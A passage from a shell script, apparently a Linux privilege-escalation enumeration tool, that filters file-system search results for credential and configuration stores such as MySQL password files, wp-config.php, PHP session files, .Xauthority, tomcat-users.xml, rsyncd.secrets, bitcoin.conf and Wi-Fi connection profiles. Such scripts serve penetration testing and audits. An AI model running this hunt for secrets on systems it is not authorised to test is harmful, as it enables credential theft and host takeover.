"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "mysql$|passwd\.ibd$|password.*\.ibd$|pwd\.ibd$|mysqld\.cnf$" | sort |
uniq | head -n 70) PSTORAGE_MARIADB=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70)
PSTORAGE_POSTGRESQL=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$|pgadmin4\.db$" |
sort | uniq | head -n 70) PSTORAGE_APACHE_NGINX=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "sites-enabled$|000-default\.conf$|php\.ini$|nginx\.conf$|nginx$" |
sort | uniq | head -n 70) PSTORAGE_VARNISH=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "varnish$" | sort | uniq | head -n 70) PSTORAGE_PHP_SESSIONS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E
"^${ROOT_FOLDER}var|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}private|^${ROOT_FOLDER}tmp"
| grep -E "sess_.*$" | sort | uniq | head -n 70) PSTORAGE_PHP_FILES=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort |
uniq | head -n 70) PSTORAGE_APACHE_AIRFLOW=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "airflow\.cfg$|webserver_config\.py$" | sort | uniq | head -n 70)
PSTORAGE_X11=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.Xauthority$" | sort | uniq | head -n 70) PSTORAGE_WORDPRESS=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "wp-config\.php$" | sort | uniq | head -n 70) PSTORAGE_DRUPAL=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E '/default/settings.php' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "settings\.php$" | sort | uniq | head -n 70) PSTORAGE_MOODLE=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E 'moodle/config.php' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "config\.php$" | sort | uniq | head -n 70) PSTORAGE_TOMCAT=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) PSTORAGE_MONGO=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "mongod.*\.conf$" | sort | uniq | head -n 70)
PSTORAGE_ROCKETCHAT=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}var|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "rocketchat\.service$" | sort | uniq | head -n 70)
PSTORAGE_SUPERVISORD=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "supervisord\.conf$" | sort | uniq | head -n 70) PSTORAGE_CESI=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "cesi\.conf$" | sort | uniq | head -n 70) PSTORAGE_RSYNC=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70)
PSTORAGE_RPCD=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E '/init.d/|/sbin/|/usr/share/' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "rpcd$" | sort | uniq | head -n 70) PSTORAGE_BITCOIN=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "bitcoin\.conf$" | sort | uniq | head -n 70) PSTORAGE_HOSTAPD=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "hostapd\.conf$" | sort | uniq | head -n 70)
PSTORAGE_WIFI_CONNECTIONS=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^${ROOT_FOLDER}etc" | grep -E "system-connections$" | sort | uniq |
head -n 70) PSTORAGE_PAM_AUTH=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^${ROOT_FOLDER}etc" | grep -E "pam\.d$" | sort | uniq | head -n 70)
PSTORAGE_NFS_EXPORTS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^${ROOT_FOLDER}etc" | grep -E "exports$" | sort | uniq | head -n 70)
PSTORAGE_GLUSTERFS=$(echo -e
